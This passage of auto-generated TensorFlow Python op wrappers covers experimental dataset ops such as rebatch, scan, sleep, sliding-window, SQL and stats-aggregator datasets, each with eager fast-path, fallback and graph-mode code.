    input_dataset: A `Tensor` of type `variant`.
      A variant tensor representing the input dataset.
    num_workers: A `Tensor` of type `int64`.
      A scalar representing the number of workers to distribute this batch across. As
      a result of this transformation the current batch size would end up being
      divided by this parameter.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C++ fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalRebatchDataset", name, _ctx._post_execution_callbacks,
        input_dataset, num_workers, "output_types", output_types,
        "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # Inputs need Python-side conversion; retry via the slow path.
      try:
        return experimental_rebatch_dataset_eager_fallback(
            input_dataset, num_workers, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise the C++ status as the matching Python exception,
      # appending the op name (when given) for easier debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_rebatch_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_rebatch_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalRebatchDataset", input_dataset=input_dataset,
                                      num_workers=num_workers,
                                      output_types=output_types,
                                      output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  # Capture the resolved attrs from the created op for gradient recording.
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalRebatchDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalRebatchDataset(input_dataset, num_workers, output_types, output_shapes, name=None):
  # Raw-op alias: forwards straight to the snake_case implementation.
  return experimental_rebatch_dataset(input_dataset, num_workers,
                                      output_types, output_shapes, name)
ExperimentalRebatchDataset.__doc__ = experimental_rebatch_dataset.__doc__
ExperimentalRebatchDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalRebatchDataset))
tf_export("raw_ops.ExperimentalRebatchDataset")(ExperimentalRebatchDataset)
def experimental_rebatch_dataset_eager_fallback(input_dataset, num_workers, output_types, output_shapes, name=None, ctx=None):
  r"""Slow-path eager-mode executor for experimental_rebatch_dataset.

  Validates the attribute lists, converts the inputs to tensors and runs
  the ExperimentalRebatchDataset op through _execute.execute.
  """
  exec_ctx = ctx if ctx else _context.context()
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_rebatch_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(dt, "output_types") for dt in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_rebatch_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(sh, "output_shapes")
                   for sh in output_shapes]
  flat_inputs = [
      _ops.convert_to_tensor(input_dataset, _dtypes.variant),
      _ops.convert_to_tensor(num_workers, _dtypes.int64),
  ]
  op_attrs = ("output_types", output_types, "output_shapes", output_shapes)
  results = _execute.execute(
      b"ExperimentalRebatchDataset", 1, inputs=flat_inputs, attrs=op_attrs,
      ctx=exec_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalRebatchDataset", flat_inputs, op_attrs, results, name)
  dataset_variant, = results
  return dataset_variant
def experimental_scan_dataset(input_dataset, initial_state, other_arguments, f, output_types, output_shapes, preserve_cardinality=False, name=None):
  r"""Creates a dataset successively reduces `f` over the elements of `input_dataset`.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    initial_state: A list of `Tensor` objects.
    other_arguments: A list of `Tensor` objects.
    f: A function decorated with @Defun.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    preserve_cardinality: An optional `bool`. Defaults to `False`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C++ fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalScanDataset", name, _ctx._post_execution_callbacks,
        input_dataset, initial_state, other_arguments, "f", f, "output_types",
        output_types, "output_shapes", output_shapes, "preserve_cardinality",
        preserve_cardinality)
      return _result
    except _core._FallbackException:
      # Inputs need Python-side conversion; retry via the slow path.
      try:
        return experimental_scan_dataset_eager_fallback(
            input_dataset, initial_state, other_arguments, f=f,
            output_types=output_types, output_shapes=output_shapes,
            preserve_cardinality=preserve_cardinality, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise the C++ status as the matching Python exception,
      # appending the op name (when given) for easier debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_scan_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_scan_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  if preserve_cardinality is None:
    preserve_cardinality = False
  preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalScanDataset", input_dataset=input_dataset,
                                   initial_state=initial_state,
                                   other_arguments=other_arguments, f=f,
                                   output_types=output_types,
                                   output_shapes=output_shapes,
                                   preserve_cardinality=preserve_cardinality,
                                   name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  # Tstate/Targuments are inferred by the op builder from the input dtypes;
  # read all resolved attrs back for gradient recording.
  _attrs = ("f", _op.get_attr("f"), "Tstate", _op.get_attr("Tstate"),
            "Targuments", _op.get_attr("Targuments"), "output_types",
            _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"), "preserve_cardinality",
            _op.get_attr("preserve_cardinality"))
  _execute.record_gradient(
      "ExperimentalScanDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalScanDataset(input_dataset, initial_state, other_arguments, f, output_types, output_shapes, preserve_cardinality=False, name=None):
  # Raw-op alias: forwards straight to the snake_case implementation.
  return experimental_scan_dataset(input_dataset, initial_state,
                                   other_arguments, f, output_types,
                                   output_shapes, preserve_cardinality, name)
ExperimentalScanDataset.__doc__ = experimental_scan_dataset.__doc__
ExperimentalScanDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalScanDataset))
tf_export("raw_ops.ExperimentalScanDataset")(ExperimentalScanDataset)
def experimental_scan_dataset_eager_fallback(input_dataset, initial_state, other_arguments, f, output_types, output_shapes, preserve_cardinality=False, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.

  This is for function experimental_scan_dataset
  """
  _ctx = ctx if ctx else _context.context()
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_scan_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_scan_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  if preserve_cardinality is None:
    preserve_cardinality = False
  preserve_cardinality = _execute.make_bool(preserve_cardinality, "preserve_cardinality")
  # Tstate/Targuments attr values are inferred from the dtypes of the
  # converted tensors; conversion also normalizes the two tensor lists.
  _attr_Tstate, initial_state = _execute.convert_to_mixed_eager_tensors(initial_state, _ctx)
  _attr_Targuments, other_arguments = _execute.convert_to_mixed_eager_tensors(other_arguments, _ctx)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  # Flat input order must match the op definition: dataset, state, captures.
  _inputs_flat = [input_dataset] + list(initial_state) + list(other_arguments)
  _attrs = ("f", f, "Tstate", _attr_Tstate, "Targuments", _attr_Targuments,
            "output_types", output_types, "output_shapes", output_shapes,
            "preserve_cardinality", preserve_cardinality)
  _result = _execute.execute(b"ExperimentalScanDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalScanDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def experimental_set_stats_aggregator_dataset(input_dataset, stats_aggregator, tag, counter_prefix, output_types, output_shapes, name=None):
  r"""Creates a dataset that forwards statistics to the given stats aggregator.

  (Generated op wrapper; upstream op has no description.)

  Args:
    input_dataset: A `Tensor` of type `variant`.
    stats_aggregator: A `Tensor` of type `resource`.
    tag: A `Tensor` of type `string`.
    counter_prefix: A `Tensor` of type `string`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C++ fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalSetStatsAggregatorDataset", name,
        _ctx._post_execution_callbacks, input_dataset, stats_aggregator, tag,
        counter_prefix, "output_types", output_types, "output_shapes",
        output_shapes)
      return _result
    except _core._FallbackException:
      # Inputs need Python-side conversion; retry via the slow path.
      try:
        return experimental_set_stats_aggregator_dataset_eager_fallback(
            input_dataset, stats_aggregator, tag, counter_prefix,
            output_types=output_types, output_shapes=output_shapes, name=name,
            ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise the C++ status as the matching Python exception,
      # appending the op name (when given) for easier debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_set_stats_aggregator_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_set_stats_aggregator_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalSetStatsAggregatorDataset", input_dataset=input_dataset,
                                                 stats_aggregator=stats_aggregator,
                                                 tag=tag,
                                                 counter_prefix=counter_prefix,
                                                 output_types=output_types,
                                                 output_shapes=output_shapes,
                                                 name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  # Capture the resolved attrs from the created op for gradient recording.
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalSetStatsAggregatorDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalSetStatsAggregatorDataset(input_dataset, stats_aggregator, tag, counter_prefix, output_types, output_shapes, name=None):
  # Raw-op alias: forwards straight to the snake_case implementation.
  return experimental_set_stats_aggregator_dataset(
      input_dataset, stats_aggregator, tag, counter_prefix, output_types,
      output_shapes, name)
ExperimentalSetStatsAggregatorDataset.__doc__ = experimental_set_stats_aggregator_dataset.__doc__
ExperimentalSetStatsAggregatorDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalSetStatsAggregatorDataset))
tf_export("raw_ops.ExperimentalSetStatsAggregatorDataset")(ExperimentalSetStatsAggregatorDataset)
def experimental_set_stats_aggregator_dataset_eager_fallback(input_dataset, stats_aggregator, tag, counter_prefix, output_types, output_shapes, name=None, ctx=None):
  r"""Slow-path eager-mode executor for experimental_set_stats_aggregator_dataset.

  Validates the attribute lists, converts the inputs to tensors and runs
  the ExperimentalSetStatsAggregatorDataset op through _execute.execute.
  """
  exec_ctx = ctx if ctx else _context.context()
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_set_stats_aggregator_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(dt, "output_types") for dt in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_set_stats_aggregator_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(sh, "output_shapes")
                   for sh in output_shapes]
  flat_inputs = [
      _ops.convert_to_tensor(input_dataset, _dtypes.variant),
      _ops.convert_to_tensor(stats_aggregator, _dtypes.resource),
      _ops.convert_to_tensor(tag, _dtypes.string),
      _ops.convert_to_tensor(counter_prefix, _dtypes.string),
  ]
  op_attrs = ("output_types", output_types, "output_shapes", output_shapes)
  results = _execute.execute(
      b"ExperimentalSetStatsAggregatorDataset", 1, inputs=flat_inputs,
      attrs=op_attrs, ctx=exec_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalSetStatsAggregatorDataset", flat_inputs, op_attrs, results,
      name)
  dataset_variant, = results
  return dataset_variant
def experimental_sleep_dataset(input_dataset, sleep_microseconds, output_types, output_shapes, name=None):
  r"""Creates a dataset that sleeps before producing each input element.

  (Generated op wrapper; upstream op has no description.)

  Args:
    input_dataset: A `Tensor` of type `variant`.
    sleep_microseconds: A `Tensor` of type `int64`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C++ fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalSleepDataset", name, _ctx._post_execution_callbacks,
        input_dataset, sleep_microseconds, "output_types", output_types,
        "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # Inputs need Python-side conversion; retry via the slow path.
      try:
        return experimental_sleep_dataset_eager_fallback(
            input_dataset, sleep_microseconds, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise the C++ status as the matching Python exception,
      # appending the op name (when given) for easier debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_sleep_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_sleep_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalSleepDataset", input_dataset=input_dataset,
                                    sleep_microseconds=sleep_microseconds,
                                    output_types=output_types,
                                    output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  # Capture the resolved attrs from the created op for gradient recording.
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalSleepDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalSleepDataset(input_dataset, sleep_microseconds, output_types, output_shapes, name=None):
  # Raw-op alias: forwards straight to the snake_case implementation.
  return experimental_sleep_dataset(input_dataset, sleep_microseconds,
                                    output_types, output_shapes, name)
ExperimentalSleepDataset.__doc__ = experimental_sleep_dataset.__doc__
ExperimentalSleepDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalSleepDataset))
tf_export("raw_ops.ExperimentalSleepDataset")(ExperimentalSleepDataset)
def experimental_sleep_dataset_eager_fallback(input_dataset, sleep_microseconds, output_types, output_shapes, name=None, ctx=None):
  r"""Slow-path eager-mode executor for experimental_sleep_dataset.

  Validates the attribute lists, converts the inputs to tensors and runs
  the ExperimentalSleepDataset op through _execute.execute.
  """
  exec_ctx = ctx if ctx else _context.context()
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_sleep_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(dt, "output_types") for dt in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_sleep_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(sh, "output_shapes")
                   for sh in output_shapes]
  flat_inputs = [
      _ops.convert_to_tensor(input_dataset, _dtypes.variant),
      _ops.convert_to_tensor(sleep_microseconds, _dtypes.int64),
  ]
  op_attrs = ("output_types", output_types, "output_shapes", output_shapes)
  results = _execute.execute(
      b"ExperimentalSleepDataset", 1, inputs=flat_inputs, attrs=op_attrs,
      ctx=exec_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalSleepDataset", flat_inputs, op_attrs, results, name)
  dataset_variant, = results
  return dataset_variant
def experimental_sliding_window_dataset(input_dataset, window_size, window_shift, window_stride, output_types, output_shapes, name=None):
  r"""Creates a dataset that passes a sliding window over `input_dataset`.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    window_size: A `Tensor` of type `int64`.
      A scalar representing the number of elements in the
      sliding window.
    window_shift: A `Tensor` of type `int64`.
      A scalar representing the steps moving the sliding window
      forward in one iteration. It must be positive.
    window_stride: A `Tensor` of type `int64`.
      A scalar representing the stride of the input elements of the sliding window.
      It must be positive.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C++ fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalSlidingWindowDataset", name,
        _ctx._post_execution_callbacks, input_dataset, window_size,
        window_shift, window_stride, "output_types", output_types,
        "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # Inputs need Python-side conversion; retry via the slow path.
      try:
        return experimental_sliding_window_dataset_eager_fallback(
            input_dataset, window_size, window_shift, window_stride,
            output_types=output_types, output_shapes=output_shapes, name=name,
            ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise the C++ status as the matching Python exception,
      # appending the op name (when given) for easier debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_sliding_window_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_sliding_window_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalSlidingWindowDataset", input_dataset=input_dataset,
                                            window_size=window_size,
                                            window_shift=window_shift,
                                            window_stride=window_stride,
                                            output_types=output_types,
                                            output_shapes=output_shapes,
                                            name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  # Capture the resolved attrs from the created op for gradient recording.
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalSlidingWindowDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalSlidingWindowDataset(input_dataset, window_size, window_shift, window_stride, output_types, output_shapes, name=None):
  # Raw-op alias: forwards straight to the snake_case implementation.
  return experimental_sliding_window_dataset(
      input_dataset, window_size, window_shift, window_stride, output_types,
      output_shapes, name)
ExperimentalSlidingWindowDataset.__doc__ = experimental_sliding_window_dataset.__doc__
ExperimentalSlidingWindowDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalSlidingWindowDataset))
tf_export("raw_ops.ExperimentalSlidingWindowDataset")(ExperimentalSlidingWindowDataset)
def experimental_sliding_window_dataset_eager_fallback(input_dataset, window_size, window_shift, window_stride, output_types, output_shapes, name=None, ctx=None):
  r"""Slow-path eager-mode executor for experimental_sliding_window_dataset.

  Validates the attribute lists, converts the inputs to tensors and runs
  the ExperimentalSlidingWindowDataset op through _execute.execute.
  """
  exec_ctx = ctx if ctx else _context.context()
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_sliding_window_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(dt, "output_types") for dt in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_sliding_window_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(sh, "output_shapes")
                   for sh in output_shapes]
  flat_inputs = [
      _ops.convert_to_tensor(input_dataset, _dtypes.variant),
      _ops.convert_to_tensor(window_size, _dtypes.int64),
      _ops.convert_to_tensor(window_shift, _dtypes.int64),
      _ops.convert_to_tensor(window_stride, _dtypes.int64),
  ]
  op_attrs = ("output_types", output_types, "output_shapes", output_shapes)
  results = _execute.execute(
      b"ExperimentalSlidingWindowDataset", 1, inputs=flat_inputs,
      attrs=op_attrs, ctx=exec_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalSlidingWindowDataset", flat_inputs, op_attrs, results,
      name)
  dataset_variant, = results
  return dataset_variant
def experimental_sql_dataset(driver_name, data_source_name, query, output_types, output_shapes, name=None):
  r"""Creates a dataset that executes a SQL query and emits rows of the result set.

  Args:
    driver_name: A `Tensor` of type `string`.
      The database type. Currently, the only supported type is 'sqlite'.
    data_source_name: A `Tensor` of type `string`.
      A connection string to connect to the database.
    query: A `Tensor` of type `string`. A SQL query to execute.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C++ fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalSqlDataset", name, _ctx._post_execution_callbacks,
        driver_name, data_source_name, query, "output_types", output_types,
        "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # Inputs need Python-side conversion; retry via the slow path.
      try:
        return experimental_sql_dataset_eager_fallback(
            driver_name, data_source_name, query, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise the C++ status as the matching Python exception,
      # appending the op name (when given) for easier debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_sql_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_sql_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalSqlDataset", driver_name=driver_name,
                                  data_source_name=data_source_name,
                                  query=query, output_types=output_types,
                                  output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  # Capture the resolved attrs from the created op for gradient recording.
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalSqlDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalSqlDataset(driver_name, data_source_name, query, output_types, output_shapes, name=None):
  # Raw-op alias: forwards straight to the snake_case implementation.
  return experimental_sql_dataset(driver_name, data_source_name, query,
                                  output_types, output_shapes, name)
ExperimentalSqlDataset.__doc__ = experimental_sql_dataset.__doc__
ExperimentalSqlDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalSqlDataset))
tf_export("raw_ops.ExperimentalSqlDataset")(ExperimentalSqlDataset)
def experimental_sql_dataset_eager_fallback(driver_name, data_source_name, query, output_types, output_shapes, name=None, ctx=None):
  r"""Slow-path eager-mode executor for experimental_sql_dataset.

  Validates the attribute lists, converts the inputs to string tensors and
  runs the ExperimentalSqlDataset op through _execute.execute.
  """
  exec_ctx = ctx if ctx else _context.context()
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_sql_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(dt, "output_types") for dt in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_sql_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(sh, "output_shapes")
                   for sh in output_shapes]
  flat_inputs = [
      _ops.convert_to_tensor(driver_name, _dtypes.string),
      _ops.convert_to_tensor(data_source_name, _dtypes.string),
      _ops.convert_to_tensor(query, _dtypes.string),
  ]
  op_attrs = ("output_types", output_types, "output_shapes", output_shapes)
  results = _execute.execute(
      b"ExperimentalSqlDataset", 1, inputs=flat_inputs, attrs=op_attrs,
      ctx=exec_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalSqlDataset", flat_inputs, op_attrs, results, name)
  dataset_variant, = results
  return dataset_variant
def experimental_stats_aggregator_handle(container="", shared_name="", name=None):
  r"""Creates a statistics manager resource.

  Args:
    container: An optional `string`. Defaults to `""`.
    shared_name: An optional `string`. Defaults to `""`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `resource`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C++ fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalStatsAggregatorHandle", name,
        _ctx._post_execution_callbacks, "container", container, "shared_name",
        shared_name)
      return _result
    except _core._FallbackException:
      # Inputs need Python-side conversion; retry via the slow path.
      try:
        return experimental_stats_aggregator_handle_eager_fallback(
            container=container, shared_name=shared_name, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Re-raise the C++ status as the matching Python exception,
      # appending the op name (when given) for easier debugging.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if container is None:
    container = ""
  container = _execute.make_str(container, "container")
  if shared_name is None:
    shared_name = ""
  shared_name = _execute.make_str(shared_name, "shared_name")
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalStatsAggregatorHandle", container=container,
                                             shared_name=shared_name,
                                             name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  # Capture the resolved attrs from the created op for gradient recording.
  _attrs = ("container", _op.get_attr("container"), "shared_name",
            _op.get_attr("shared_name"))
  _execute.record_gradient(
      "ExperimentalStatsAggregatorHandle", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalStatsAggregatorHandle(container="", shared_name="", name=None):
  # Thin raw-op alias; delegates to the snake_case implementation.
  return experimental_stats_aggregator_handle(container=container, shared_name=shared_name, name=name)
ExperimentalStatsAggregatorHandle.__doc__ = experimental_stats_aggregator_handle.__doc__
# Hide from generated docs, wrap with _kwarg_only (presumably enforcing
